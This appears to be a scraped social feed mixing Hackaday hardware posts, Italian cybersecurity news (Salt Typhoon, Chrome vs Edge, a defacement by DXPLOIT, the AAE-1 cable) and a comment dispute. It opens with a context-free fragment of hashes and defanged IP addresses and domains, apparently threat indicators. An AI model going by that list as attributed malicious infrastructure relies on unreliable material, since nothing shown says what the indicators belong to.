26d1adb6d0bcc65e758edaf71a8f665d
Plugin Orchestrator
cbe0cca151a6ecea47cfaa25c3b1c8a8
35ece05b5500a8fc422cec87595140a7
Domains and IPs
62.233.57[.]94
82.118.21[.]230
194.71.107[.]215
151.236.16[.]167
www.socialentertainments[.]store
www.rambiler[.]com
5.34.176[.]46
195.123.242[.]120
195.123.217[.]139
Shining Through: Germanium and Gold Leaf Transparency
Germanium. It might sound like just another periodic table entry (number 32, to be exact), but in the world of infrared light, it’s anything but ordinary. A recent video by [The Action Lab] dives into the fascinating property of germanium being transparent to infrared light. This might sound like sci-fi jargon, but it’s a real phenomenon that can be easily demonstrated with nothing more than a flashlight and a germanium coin. If you want to see how that looks, watch the video on how it’s done.
The fun doesn’t stop at germanium. In experiments, thin layers of gold—yes, the real deal—allowed visible light to shine through, provided the metal was reduced to a thickness of 100 nanometers (or: gold leaf). These hacks reveal something incredible: light interacts with materials in ways we don’t normally observe.
For instance, infrared light, with its lower energy, can pass through germanium, while visible light cannot. And while solid gold might seem impenetrable, its ultra-thin form becomes translucent, demonstrating the delicate dance of electromagnetic waves and electrons.
The implications of these discoveries aren’t just academic. From infrared cameras to optics used in space exploration, understanding these interactions has unlocked breakthroughs in technology. Has this article inspired you to craft something new? Or have you explored an effect similar to this? Let us know in the comments!
We usually take our germanium in the form of a diode. Or, maybe, a transistor.
youtube.com/embed/b81q8-hscTc?…
reshared this
Perfecting 20 Minute PCBs with Laser
Normally, you have a choice with PCB prototypes: fast or cheap. [Stephen Hawes] has been trying fiber lasers to create PCBs. He’s learned a lot which he shares in the video below. Very good-looking singled-sided boards take just a few minutes. Fiber lasers are not cheap but they are within range for well-off hackers and certainly possible for a well-funded hackerspace.
One thing that’s important is to use FR1 phenolic substrate instead of the more common FR4. FR4 uses epoxy which will probably produce some toxic fumes under the laser.
We were surprised at how good the boards looked. Of course, the line definition was amazing, as you’d expect from a laser with details down to 200 microns (a little less than 0.008″), and he thinks it can go even lower. The laser also drills holes and can cut the board outline. A silk screen makes it easy to add a solder mask, and the laser will even cut the mask. [Stephen] also etched “silk screening” into the solder mask and filled it with a different color solder mask to make nice board legends.
Registration is critical and will be extra critical for two-sided boards which is what he’s working on now. We think if you put some scored carrier edges around the board with fiducials, you could make a jig that would hold the board in a very precise position using the holes in the carrier edges.
Vias are another issue. He mentions using rivets, but we’ve also seen people simply solder both sides of a wire through a hole, which isn’t that hard.
For most people, making your own PCBs is fun but not very practical. But there is something about being able to turn around actually good-looking boards multiple times in a day when you are doing heavy development. If you don’t mind fumes, you can laser mark your PCBs.
youtube.com/embed/wAiGCyZZq6w?…
nostr_cn_dev likes this.
Hackaday Links: January 5, 2025
Good news this week from the Sun’s far side as the Parker Solar Probe checked in after its speedrun through our star’s corona. Parker became the fastest human-made object ever — aside from the manhole cover, of course — as it fell into the Sun’s gravity well on Christmas Eve to pass within 6.1 million kilometers of the surface, in an attempt to study the extremely dynamic environment of the solar atmosphere. Similar to how manned spacecraft returning to Earth are blacked out from radio communications, the plasma soup Parker flew through meant everything it would do during the pass had to be autonomous, and we wouldn’t know how it went until the probe cleared the high-energy zone. The probe pinged Earth with a quick “I’m OK” message on December 26, and checked in with the Deep Space Network as scheduled on January 1, dumping telemetry data that indicated the spacecraft not only survived its brush with the corona but that every instrument performed as expected during the pass. The scientific data from the instruments won’t be downloaded until the probe is in a little better position, and then Parker will get to do the whole thing again twice more in 2025.
Good news too for Apple users, some of whom stand to get a cool $100 as part of a settlement into allegations that Siri-enabled devices “unintentionally” recorded conversations. The $95 million agreement settles a lawsuit brought by users who were shocked — SHOCKED! — to see ads related to esoteric subjects they had recently discussed, apparently independently of uttering the “Hey, Siri” wake phrase. Apple seems to acknowledge that some recordings were made without the wake word, characterizing them as “unintentional” and disputing the plaintiffs’ claims that the recordings were passed to third parties for targeted advertising. The settlement, which may be certified in February, would award the princely sum of $20 to claimants for each Apple device they owned over a ten-year period, up to five devices total.
In related news, Apple is also getting some attention for apparently opting users into its Enhanced Visual Search system. The feature is intended to make it easier to classify and search your photos based on well-known landmarks or points of interest, so if you take a selfie in front of the Eiffel Tower or Grand Canyon, it’ll recognize those features visually and record the fact. It does so by running your snapshots through a local AI algorithm and then encrypting the portion of the image it thinks contains the landmark. The encrypted portion of the image then goes to the cloud for analysis, apparently without getting decrypted, and the suggested location goes back to your device in encrypted form. It’s possible to turn the feature off, but you have to know it’s there in the first place, which we imagine not a lot of Apple users do. While there’s no sign that this new feature leaks any user data, there are a lot of moving pieces that sure seem ripe for exploitation, given enough time.
Are you as sick of counting the numbers of bridges or traffic lights in potato-vision images or trying to figure out if that one square has a few pixels of the rear-view mirror of a motorcycle to prove you’re human? We sure are, and while we’d love to see CAPTCHAs go the way of the dodo, they’re probably here to stay. So, why not have fun with the concept and play a round of DOOM on nightmare mode to prove your non-robotness? That was Guillermo Rauch’s idea, and we have to say it’s pretty cool. You’ve got to kill three monsters to solve the puzzle, and we found it pretty difficult, in part because we’re more used to the WASD layout than using the arrow keys for player movement. Just watch out if you give it a try with headphones on — it’s pretty loud.
And finally, if you feel like your life is missing in-depth knowledge of the inner workings of a Boeing 777’s auxiliary power unit, we’ve got good news for you. We stumbled across this playlist of excellent animations that shows every nook and cranny of the APU, and how it operates. For the uninitiated, the APU is basically a gas turbine engine that lives in the tail of jetliners and provides electrical and pneumatic power whenever the main engines aren’t running. It sounds simple, but there’s so much engineering packed into the APU and the way it integrates into the aircraft systems. We’ve always known that jets have a lot of redundancy built into them, but this series really brought that home to us. Enjoy!
youtube.com/embed/9bMytwuwqew?…
And finally finally, we generally don’t like to plug the Hack Chat here in this space, but we thought we’d make an exception since we’re kicking off the 2025 series in a big way with Eben Upton! The co-founder and CEO of Raspberry Pi will stop by the Hack Chat on January 15 at noon Pacific time, and we just want to get the word out as soon as possible. Hope to see you there!
Il report 2024 della Polizia Postale sui crimini informatici commentato riga per riga
In questo episodio potete sentire l'audio del video che ho preparato su YouTube con il commento riga per riga del Report del 2024 della Polizia Postale sui crimini informatici in Italia, aggiornato al 21 dicembre 2024.
zerodays.podbean.com/e/il-repo…
Gazzetta del Cadavere reshared this.
Reverse-Engineering the Polynomial Constants in the Pentium’s FPU
Die photo of the Intel Pentium processor with the floating point constant ROM highlighted in red. (Credit: Ken Shirriff)
Released in 1993, Intel’s Pentium processor was a marvel of technological progress. Its floating point unit (FPU) was a big improvement over its predecessors that still used the venerable CORDIC algorithm. In a recent blog post [Ken Shirriff] takes an up-close look at the FPU and associated ROMs in the Pentium die that enable its use of polynomials. Even with 3.1 million transistors, the Pentium die is still on a large enough process node that it can be readily analyzed with an optical microscope.
In the blog post, [Ken] shows how you can see the constants in each ROM section, with each bit set as either a transistor (‘1’) or no transistor (‘0’), making read-out very easy. The example looks at the constant of pi, which the Pentium’s FPU has stored as a version with no fewer than 67 significand bits along with its exponent.
Multiplexer circuitry allows for the selection of the appropriate entry in the ROM. The exponent section always takes up 18 bits (1 for the significand sign). The significand section is actually 68 bits total, but it starts with a mysterious first bit with no apparent purpose.
After analyzing and transcribing the 304 total constants like this, [Ken] explains how these constants are used with polynomial approximations. This feature allows the Pentium’s FPU to be about 2-3 times faster than the 486 with CORDIC, giving even home users access to significant FPU features a few years before the battle of MMX, 3DNow!, SSE, and today’s AVX extensions began.
Featured image: A diagram of the constant ROM and supporting circuitry. Most of the significand ROM has been cut out to make it fit. (Credit: Ken Shirriff)
USA Dopo Salt Typhoon: Basta Backdoor, la crittografia diventa legge
Le autorità americane stanno cambiando il loro approccio alla crittografia dopo gli attacchi informatici su larga scala associati al gruppo cinese Salt Typhoon. Gli hacker hanno avuto accesso alle chiamate di funzionari di alto rango, in quella che gli esperti hanno definito la violazione più grave nella storia delle telecomunicazioni statunitensi.
Durante la conferenza stampa, Jeff Green, direttore della sicurezza informatica della CISA, ha osservato che la crittografia è ora considerata uno strumento di sicurezza fondamentale.
Lui e un funzionario dell’FBI consigliarono di utilizzare la “crittografia gestita” per chiamate e messaggi. Questa settimana, CISA ha pubblicato una guida che consiglia ai politici e ai funzionari governativi di passare a comunicazioni sicure.
Queste raccomandazioni sono sorprendentemente diverse dalla precedente posizione delle autorità, che insistevano sulla creazione di “backdoor” per le forze dell’ordine. Tuttavia, eventi recenti, inclusa la campagna Salt Typhoon, hanno dimostrato che tali scappatoie possono essere sfruttate dagli aggressori.
La CALEA, approvata nel 1994, imponeva alle società di telecomunicazioni di fornire l’accesso ai dati alle forze dell’ordine. Tuttavia, questo sistema ha fallito: gli hacker cinesi hanno sfruttato le vulnerabilità per intercettare le chiamate dei funzionari americani. Ciò ha portato a critiche e richieste di riforme per eliminare tali backdoor.
Secondo John Ackerley, cofondatore di Virtru, il dibattito sulla necessità della crittografia è finito. Ha sottolineato che gli Stati Uniti devono accettare incondizionatamente la crittografia senza scappatoie. Anche il senatore Ron Wyden sostiene questa idea, avendo proposto una legislazione che impone agli operatori di telecomunicazioni di implementare rigorosi standard di sicurezza informatica.
L’incidente del Salt Typhoon è diventato un segnale per una revisione delle politiche di sicurezza. Gli esperti ritengono che solo le modifiche legislative aiuteranno a proteggere le telecomunicazioni americane da attacchi simili in futuro.
L'articolo USA Dopo Salt Typhoon: Basta Backdoor, la crittografia diventa legge proviene da il blog della sicurezza informatica.
Paolo Redaelli reshared this.
USA Dopo Salt Typhoon: Basta Backdoor, la crittografia diventa legge
Le autorità americane stanno cambiando il loro #approccio alla #crittografia dopo gli attacchi informatici su larga scala associati al gruppo cinese Salt Typhoon. Gli hacker hanno avuto #accesso alle chiamate di funzionari di alto rango, in quella che gli #esperti hanno definito la #violazione più grave nella storia delle #telecomunicazioni statunitensi.
redhotcyber.com/post/usa-dopo-…
#redhotcyber #hacking #cti #ai #online #it #cybercrime #cybersecurity #technology #news #cyberthreatintelligence #innovation #privacy #engineering #intelligence #intelligenzaartificiale #informationsecurity #ethicalhacking #dataprotection #cybersecurityawareness
USA Dopo Salt Typhoon: Basta Backdoor, la crittografia diventa legge
Dopo il più grande attacco hacker della storia, gli USA rivedono la sicurezza delle telecomunicazioni: addio scappatoie, benvenuta crittografia.Redazione RHC (Red Hot Cyber)
reshared this
Chrome vs Edge: Chi vincerà la battaglia dell’intelligenza artificiale?
Il nuovo anno è iniziato con un’altra feroce competizione nel mercato dei browser. Google con Chrome e Microsoft con Edge continuano a lottare per accaparrarsi utenti, ricorrendo ad approcci sempre più innovativi e persistenti. Mentre Edge sta gradualmente aumentando la sua quota di mercato, Chrome sta rafforzando la sua posizione e mantenendo con sicurezza la sua leadership.
Secondo gli ultimi dati di Statcounter, Chrome ha chiuso il 2024 con una quota di mercato dominante del 66,88%. Si tratta di un aumento dell’1,65% rispetto all’anno precedente, evidenziando la sua resilienza nonostante gli sforzi di Microsoft per spingere Edge attraverso l’integrazione in Windows 11. Edge, a sua volta, ha raggiunto una quota di mercato del 13%, in crescita del 2% rispetto all’inizio del 2024. Tuttavia, la crescita di Edge è ancora insignificante rispetto al successo di Chrome.
Microsoft sta utilizzando attivamente Windows 11 come piattaforma per promuovere Edge. Gli utenti incontrano regolarmente popup che chiedono loro di impostare Edge come browser predefinito. Messaggi come “Utilizza le impostazioni consigliate da Microsoft” sono accompagnati da affermazioni secondo cui Edge fornisce una migliore protezione contro phishing e malware. Queste notifiche vengono visualizzate anche quando è installato Chrome, il che irrita gli utenti.
Da un lato, questi sforzi stanno contribuendo a una crescita modesta del numero di utenti Edge, soprattutto negli ambienti aziendali in cui la sicurezza è fondamentale. D’altro canto, i metodi aggressivi di Microsoft sono stati criticati sia dagli utenti che dalle autorità di regolamentazione. Recentemente, gli sviluppatori di browser e le organizzazioni pubbliche si sono rivolti alla Commissione Europea chiedendo di limitare tali metodi attraverso nuove normative.
Google, a sua volta, utilizza tattiche simili. Gli utenti Edge vedono spesso consigli per passare a Chrome quando visitano siti Google come YouTube. Queste notifiche evidenziano i vantaggi di Chrome, come il supporto dell’intelligenza artificiale e funzionalità di sicurezza avanzate. Pertanto, la battaglia per gli utenti del browser è diventata non solo tecnologica, ma anche di marketing.
Un’area chiave nella lotta tra browser è l’integrazione dell’intelligenza artificiale. Microsoft scommette su Copilot, integrato in Edge e Windows 11. Copilot è già utilizzato per automatizzare le attività, aiutare con i documenti e gestire i sistemi. Google, a sua volta, sta sviluppando attivamente Gemini Live, una nuova funzionalità AI che sarà presto disponibile in Chrome. Gemini Live sarà integrato nella barra laterale del browser e integrato anche nella barra delle applicazioni di Windows.
Questa mossa di Google potrebbe avere un impatto significativo sulla competitività di Chrome. Se la funzionalità Gemini Live si rivelasse effettivamente utile e conveniente, potrebbe complicare gli sforzi di Microsoft per promuovere Edge. Inoltre, l’integrazione dell’intelligenza artificiale nei browser significa una transizione verso un nuovo livello di esperienza utente, in cui la tecnologia inizia a svolgere il ruolo di assistenti personali.
Gli esperti ritengono che il 2025 segnerà un punto di svolta nel confronto tra Chrome e Edge. Le campagne antitrust negli Stati Uniti e in Europa potrebbero portare a cambiamenti significativi. Se le autorità di regolamentazione statunitensi imporranno una divisione tra Chrome e Google, si creeranno opportunità per altri attori, inclusa Microsoft.
D’altro canto anche Microsoft è sotto pressione. L’uso di Windows 11 come strumento per promuovere Edge sta sollevando sempre più domande tra i regolatori europei. È importante notare che Microsoft continua a migliorare Edge, inclusa una più profonda integrazione di Windows e ottimizzazioni delle prestazioni. Ad esempio, le ultime versioni di Edge hanno una velocità di caricamento della pagina migliorata e un’interfaccia più reattiva.
La concorrenza tra Google e Microsoft nel segmento dei browser rimane uno degli intrighi principali del settore tecnologico. Da un lato, Chrome continua a rafforzare la propria leadership con l’innovazione e un’ampia base di utenti. D’altra parte, Microsoft non si arrende e sfrutta i vantaggi sia di marketing che tecnologici di Windows 11.
Il futuro di questa lotta dipende in gran parte dal successo dell’integrazione dell’intelligenza artificiale. Gemini Live di Google e Copilot di Microsoft saranno fattori importanti nel determinare quale browser sarà più utilizzabile e richiesto. In ogni caso, gli utenti possono aspettarsi nuove funzionalità, miglioramenti e forse colpi di scena inaspettati in questa corsa tecnologica.
L'articolo Chrome vs Edge: Chi vincerà la battaglia dell’intelligenza artificiale? proviene da il blog della sicurezza informatica.
Chrome vs Edge: Chi vincerà la battaglia dell’intelligenza artificiale?
Il nuovo anno è iniziato con un’altra feroce competizione nel mercato dei browser. #Google con Chrome e #Microsoft con Edge continuano a lottare per accaparrarsi #utenti, ricorrendo ad #approcci sempre più innovativi e persistenti.
redhotcyber.com/post/chrome-vs…
#redhotcyber #hacking #cti #ai #online #it #cybercrime #cybersecurity #technology #news #cyberthreatintelligence #innovation #privacy #engineering #intelligence #intelligenzaartificiale #informationsecurity #ethicalhacking #dataprotection #cybersecurityawareness
Chrome vs Edge: Chi vincerà la battaglia dell'intelligenza artificiale?
La battaglia tra Google Chrome e Microsoft Edge entra nel vivo! Scopri come l’intelligenza artificiale e le strategie di marketing stanno ridefinendo il mercato dei browser nel 2025.Redazione RHC (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
Stacy’s Computer Has Got It Going On
According to [ClassicHasClass], the best way to open an Atari Stacy is to not open an Atari Stacy. Apparently, these old computers were not pleasant to work on. The cables were not keyed and were prone to short against things. Screws easily strip out plastic holes. Of course, there wouldn’t be a story if there wasn’t a teardown and an upgrade that you can check out in the post.
The Stacy was one of Atari’s earliest portable systems and the first ST portable (that is, STacy). There’s a backlit LCD, a keyboard and trackball, and the usual ports. You could make do with a single floppy or spring for a second floppy or an internal SCSI hard drive. The 8 MHz 68000-based machine would set you back north of $2,300 back in 1989.
The original plan was to run the thing on C-cell batteries, but that would give you about 15 minutes of operation. They finally decided it was a luggable — you’d have to plug it into the wall. The battery compartment was there, but empty and glued shut.
Apparently, there were about 35,000 of these made, but they seem somewhat rare. But we do like a rare retrocomputer. Or even some that aren’t so rare.
10 arresti in Cina per aver scritto Erotica Gay. Cultura LGBTQ+ ancora lontana
#PoliticalNotes
ilglobale.it/2025/01/10-arrest…
@politica
10 arresti in Cina per aver scritto Erotica Gay. Cultura LGBTQ+ ancora lontana
ilGlobale - Quotidiano di informazione economica, politica e tecnologicailGlobale.it
reshared this
@qwe @nuke86 si vede che proprio non sei abituato a leggere.
Evitiamo di andare sul personale? Che poi a sparare giudizi ad cazzum non si fa neanche una gran figura...
A parte che anche nell’articolo del SCMP si parla di 10 arresti, ma se non leggi difficilmente lo trovi.
Forse vedi un teso diverso da quello che vedo io?
Nel testo che ho letto io (riportato qui sotto) si parla di un numero elevato e imprecisato di casi ("dozens", "more than 50") e non specificamente di 10.
Police in eastern China have been targeting dozens of writers who posted gay-themed erotica online, resulting in heavy fines and even prison sentences.However, the crackdown by officers in Anhui, who have been investigating and detaining people from other provinces, has prompted concerns that officers are abusing their powers as well as a wider debate about whether the law is too severe.
According to posts on social media, many of those arrested had been posting stories on the Taiwanese-based fiction website Haitang Culture and charged with producing, selling or disseminating pornographic materials.
Users of the site can make money from tips or subscriptions from fans, with one of the most popular genres being danmei – a style focusing on gay romance and sex that originated in Japanese manga and has become popular in mainland China over the past two decades.
Earlier this month the news portal Shuiping Jiyuan reported that police in Anhui have detained more than 50 writers across the country since June. So far the heaviest sentence handed down was four and a half years in prison.
Under Chinese law, writers who make more than 250,000 yuan (US$34,500) from selling erotic materials can face a maximum sentence of life in prison, although in practice they can get lower sentences if they cooperate with investigators and pay back the money.
Detto questo, ilGlobale è un blog dove annoto determinate NotePolitiche (come segnalato da hashtag su ogni post di questo tipo condiviso), che reputo di rilevanza tale da volerle conservare. Il contenuto sono spunti di riflessione che introducano l’argomento. Non sono dei trattati che ti facciano conseguire un master su quella materia.
Non sapevo fossi tu l'autore. Fammi precisare, se fosse necessario, che il mio "scritto col culo" era un giudizio sull'articolo e non un giudizio personale sul suo autore.
Se poi NotaPolitica/#PoliticalNotes (termine che sento oggi per la prima volta) è un genere diverso cui non si applicano le mie critiche, mi scuso per la mia ignoranza e, comunque, ti invito a riflettere sull'opportunità di postare articoli degni di esser letti invece che cose con meno valore e contenuti delle fonti che usano (se la NotaPolitica non aggiunge nulla, linka direttamente la fonte, no?).
Quindi di scritto col culo non c’è proprio nulla,
Non sequitur.
se vuoi leggere puoi avere spunti di riflessione, altrimenti tira dritto e vai oltre.
Un'alternativa è bloccare il tuo utente, così ho una fonte in meno di articoli insulsi e discussioni sterili (ti invito a fare altrettanto col mio)
Lavori In Corso in Pakistan Sul Cavo Sottomarino (AAE)-1
Il cavo Africa-Asia-Europa (AAE)-1, entrato in funzione nel 2017, collega Vietnam, Singapore, Malesia, Thailandia, Pakistan, India, Oman, Emirati Arabi Uniti, Qatar, Arabia Saudita, Egitto, Grecia, Italia e Francia.
Tuttavia, i guasti al cavo hanno causato frequenti rallentamenti e interruzioni agli utenti di Internet in Pakistan nel 2024.
Mentre le aziende e i provider di Internet hanno affermato che i tentativi del governo di monitorare il traffico Internet erano responsabili, la PTA ha rilasciato una dichiarazione ad agosto attribuendo il rallentamento a un cavo sottomarino difettoso.
In una dichiarazione rilasciata recentementr, la PTA ha affermato che è stato rilevato un guasto nel cavo AAE-1 nei pressi del Qatar, sottolineando che il cavo era uno dei sette cavi sottomarini internazionali che collegano il Pakistan per il traffico Internet internazionale.
“Ciò potrebbe avere un impatto sull’esperienza degli utenti di Internet e della banda larga in tutto il Pakistan“, si legge nella dichiarazione in merito al guasto. “I team interessati stanno lavorando per risolvere il guasto”, ha aggiunto la dichiarazione. “PTA sta monitorando la situazione e continuerà ad aggiornare di conseguenza gli utenti delle telecomunicazioni“.
Secondo i dati dei test di velocità globali, il Pakistan ha una delle connessioni Internet più lente al mondo, nonostante il miglioramento della velocità media della banda larga fissa e mobile registrato a ottobre.
L’indice globale Speedtest di Ookla di ottobre ha mostrato che per la banda larga fissa (connessioni cablate alle abitazioni o agli uffici) il Pakistan si è classificato al 141° posto su 158 nazioni, con una velocità media di 15,6 mbps.
Per quanto riguarda i dati mobili, il Paese si è classificato al 100° posto su 111, con una velocità media di 20,61 mbps.
Negli ultimi mesi, gli utenti in Pakistan hanno riscontrato rallentamenti, difficoltà nel scaricare contenuti multimediali su WhatsApp e problemi di connettività intermittenti.
Le frequenti interruzioni di Internet sono state associate a un accesso limitato alle reti private virtuali utilizzate da molti pakistani per accedere a X , tra gli altri siti Web con restrizioni.
Da luglio, il paese ha migliorato la sua classifica per la velocità della banda larga fissa da 145 a 141 e per i dati mobili da 101 a 100.
L'articolo Lavori In Corso in Pakistan Sul Cavo Sottomarino (AAE)-1 proviene da il blog della sicurezza informatica.
John von Neumann: il genio poliedrico della scienza del XX secolo
#redhotcyber #informationsecurity #ethicalhacking #dataprotection #hacking #cybersecurity #cybercrime #cybersecurityawareness #cybersecuritytraining #cybersecuritynews #privacy #infosecurity
redhotcyber.com/post/john-von-…
John von Neumann: il genio poliedrico della scienza del XX secolo
John von Neumann: la mente brillante che ha dato vita agli strumenti tecnologici che usiamo ancora oggiCarlo Denza (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
Lavoratrici domestiche keniote non sposate, con figli sono prive di diritti umani in Arabia Saudita
#PoliticalNotes
ilglobale.it/2025/01/lavoratri…
@politica
Lavoratrici domestiche keniote non sposate, con figli sono prive di diritti umani in Arabia Saudita
ilGlobale - Quotidiano di informazione economica, politica e tecnologicailGlobale.it
reshared this
Il Messaggio degli Hacktivisti di DXPLOIT a supporto dell’ISLAM Ai Danni di Un Concessionario Di Milano
Recentemente, il sito web Autograndi.it è stato violato e la pagina di defacement ha portato un messaggio da parte degli hacktivisti cibernetici che si identificano come parte del collettivo DXPLOIT. Il titolo della pagina violata, “PAWNED BY DXPLOIT”, è stato accompagnato da un messaggio che rivendica una causa ideologica.
Il gruppo di hacktivisti, che si presenta come i “difensori nel mondo cibernetico”, ha usato questa opportunità per veicolare un messaggio forte, incentrato sulla difesa dell’Islam come religione di pace e sulla lotta contro gli stereotipi associati ai musulmani.
Siamo la voce dei dimenticati, difensori nel mondo cibernetico, in piedi contro l'oppressione ovunque. Non siamo qui per la fama, ma per sostenere un messaggio: L'Islam è una religione di pace e i musulmani non sono terroristi. Il vero Islam difende dalle ingiustizie e rispetta l'umanità”.
“Dove sono i diritti umani di cui parlate? Vediamo il mondo pieno di conflitti e sofferenze, ma il vero spirito dell'Islam insegna la pace, la compassione e la resilienza. Non promuoviamo il terrore; difendiamo la nostra fede e il nostro popolo con dignità. L'Islam non perdona la violenza, ma promuove l'unità e il rispetto tra tutti”.
Il messaggio portato dal deface
Il messaggio lasciato dagli hacker sottolinea chiaramente che il loro scopo non è cercare notorietà o fama, ma piuttosto portare avanti una battaglia ideologica. Con queste parole, il gruppo DXPLOIT si schiera contro la distorsione della realtà sull’Islam, cercando di contrastare le narrazioni che spesso associano erroneamente la religione musulmana al terrorismo.
Il tema centrale del messaggio degli hacktivisti è una forte condanna della violenza e un appello per la pace, la compassione e la giustizia. DXPLOIT rivendica la loro posizione come difensori della loro fede e della loro comunità, chiarendo che l’Islam non promuove la violenza, ma piuttosto l’unità e il rispetto tra tutte le persone. In questo modo, il gruppo cerca di separare la propria religione da qualsiasi atto di terrorismo o estremismo.
Cos’è il Defacement
Il defacement è un tipo di attacco informatico che prevede la modifica non autorizzata di un sito web, solitamente della sua homepage, con l’intento di alterarne l’aspetto visivo e diffondere un messaggio. Gli hacker che eseguono questo attacco possono sostituire il contenuto di una pagina con un messaggio politico, religioso o ideologico, spesso accompagnato da immagini provocatorie. A differenza di altri attacchi informatici, il defacement non ha come obiettivo principale il furto di dati, ma l’impatto visivo e simbolico, cercando di attirare l’attenzione su un particolare tema.
L'articolo Il Messaggio degli Hacktivisti di DXPLOIT a supporto dell’ISLAM Ai Danni di Un Concessionario Di Milano proviene da il blog della sicurezza informatica.
Lavori In Corso in Pakistan Sul Cavo Sottomarino (AAE)-1
Il cavo Africa-Asia-Europa (AAE)-1, entrato in funzione nel 2017, collega Vietnam, Singapore, Malesia, Thailandia, Pakistan, India, Oman, Emirati Arabi Uniti, Qatar, Arabia Saudita, Egitto, Grecia, Italia e Francia. Tuttavia, i guasti al cavo hanno causato frequenti rallentamenti e interruzioni agli #utenti di Internet in Pakistan nel 2024.
redhotcyber.com/post/lavori-in…
#redhotcyber #hacking #cti #ai #online #it #cybercrime #cybersecurity #technology #news #cyberthreatintelligence #innovation #privacy #engineering #intelligence #intelligenzaartificiale #informationsecurity #ethicalhacking #dataprotection #cybersecurityawareness #cybersecuritytraining #cybersecuritynews #infosecurity
Lavori In Corso in Pakistan Sul Cavo Sottomarino (AAE)-1
I cavi sottomarini sono le arterie più nevralgiche della comunicazione internet. Recentemente uno di questi cavi è stato interrotto in Pakistan.Redazione RHC (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
Il Messaggio degli Hacktivisti di DXPLOIT a supporto dell’ISLAM Ai Danni di Un Concessionario Di Milano
redhotcyber.com/post/il-messag…
#redhotcyber #hacking #cti #ai #online #it #cybercrime #cybersecurity #technology #news #cyberthreatintelligence #innovation #privacy #engineering #intelligence #intelligenzaartificiale #informationsecurity #ethicalhacking #dataprotection #cybersecurityawareness #cybersecuritytraining #cybersecuritynews #infosecurity
Il Messaggio degli Hacktivisti di DXPLOIT a supporto dell'ISLAM Ai Danni di Un Concessionario Di Milano
Il defacement è un attacco informatico che modifica il contenuto di un sito web per diffondere un messaggio politico, religioso o ideologico.Redazione RHC (Red Hot Cyber)
Cybersecurity & cyberwarfare reshared this.
Atari 65XE In Laptop Form
For better or worse, Atari is no longer a household name in computing, but for a time in the 1980s, it was a huge mover in the industry. They not only produced PCs but also a huge number of video game consoles. Although they were a major contributor to the video game crash of the 1980s, they managed to limp along a few more years afterward and produce some interesting machines in the following years, even though they weren’t ultimately able to compete with Nintendo or Sega. One of those computers from that era was a PC-console hybrid of sorts called the Atari XE, and [Sideburn] was able to turn one into a laptop.
The retro laptop began life as an Arabic PAL version of the 65XE, the PC version of the ubiquitous 65-series computer. A large portion of the computer was reworked, including the removal of the power supply in favor of a rechargeable battery with a 6-hour life. Also among the list of scrapped components was the video and sound connectors as well as the RF modulator, which would have been common for displays at the time, but this laptop is getting a 1920×1080 LCD panel to replace all of that old hardware. A 1MB memory upgrade, new speakers and amp, a WiFi card, and an SD floppy card emulator round out the build.
The final part of the build is assembling it all into a custom 3D printed case, and the resulting laptop that [Sideburn] calls the XE Book is a faithful adaptation of this niche computer into what could have been a laptop we would have seen in the late 80s or early 90s similar to the Toshiba T3200SXC. It matches the original’s footprint and still uses all of the core components, so it’s not too difficult to imagine something like this having existed in the past.
youtube.com/embed/NYGtY7DnrUk?…
Toni Aittoniemi
in reply to N_{Dario Fadda} • • •